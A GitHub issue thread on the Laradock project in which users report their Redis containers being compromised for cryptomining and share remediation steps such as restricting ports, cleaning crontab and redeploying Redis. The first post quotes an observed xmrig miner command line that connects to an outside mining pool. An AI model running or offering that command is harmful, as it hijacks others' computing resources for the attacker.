Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Cryptojacking attack via Redis container #2346

Closed
sondoha opened this issue Oct 31, 2019 · 6 comments
Closed

Cryptojacking attack via Redis container #2346

sondoha opened this issue Oct 31, 2019 · 6 comments
Labels
Stale

Comments

@sondoha
Copy link

sondoha commented Oct 31, 2019

Info:

  • Docker version ($ docker --version):
  • Laradock commit ($ git rev-parse HEAD):
  • System info (Mac, PC, Linux):
  • System info disto/version:

Issue:

Hello,

I've been using Laradock for a while. It was great!

But just realized that Redis Docker container had been attacked. All 16 CPU cores were up to 100%.

Use htop command, I see something like this:

xmrig-notls -o pinto.mamointernet.icu:4444 -u ver1 -p ver1 --max-cpu-usage 100 --donate-level 1 -B

Has anyone faced this issue? And how did you deal with it?

PS: The same issue has been reported here:

https://medium.com/threat-intel/cryptojacking-coin-mining-cybercrime-234895bec6e1
https://gitter.im/tiangolo/fastapi?at=5d89d0b78521b34d91803d83

Expected behavior:

Reproduce:

Relevant Code:

// place a code sample here
@lanphan
Copy link
Contributor

lanphan commented Oct 31, 2019

Hi,
I think you should secure your network more by configuring firewall / gateway / proxy more secure (allow 80, 443 ports out only, for ex).
In case you have more secure configuration for Redis, please help share with us.
Thanks.

@BernardoMG
Copy link

Hi,
I'm facing the same issue on an ec2 instance. @sondoha any tip on how to remove trojan?

@sondoha
Copy link
Author

sondoha commented Nov 8, 2019

It is still happening to me. Even if I banned the Redis port from public.

So I use queue driver sync instead of redis. Sure it is for development only, I do not have any solution for production atm.

@BernardoMG
Copy link

BernardoMG commented Nov 8, 2019
edited

Yes, banning Redis port isn't enough @sondoha.

We manage to fix it by:

  1. Launching a new instance with the most recent Redis version;
  2. Clean weird crontab entries (immediately after previous step);
  3. Delete networkservice if exists

This instance looks good, no weird process consuming CPU 🙂

@ducalpha ducalpha mentioned this issue Dec 2, 2019
Closed
@stale
Copy link

stale bot commented Feb 7, 2020

Hi 👋 this issue has been automatically marked as stale 📌 because it has not had recent activity 😴. It will be closed if no further activity occurs. Thank you for your contributions ❤️.

@stale stale bot added the Stale label Feb 7, 2020
@stale
Copy link

stale bot commented Feb 28, 2020

Hi again 👋 we would like to inform you that this issue has been automatically closed 🔒 because it had not recent activity during the stale period. We really really appreciate your contributions, and looking forward for more in the future 🎈.

@stale stale bot closed this as completed Feb 28, 2020
@dcourtin dcourtin mentioned this issue Apr 11, 2020
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Stale
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@lanphan @sondoha @BernardoMG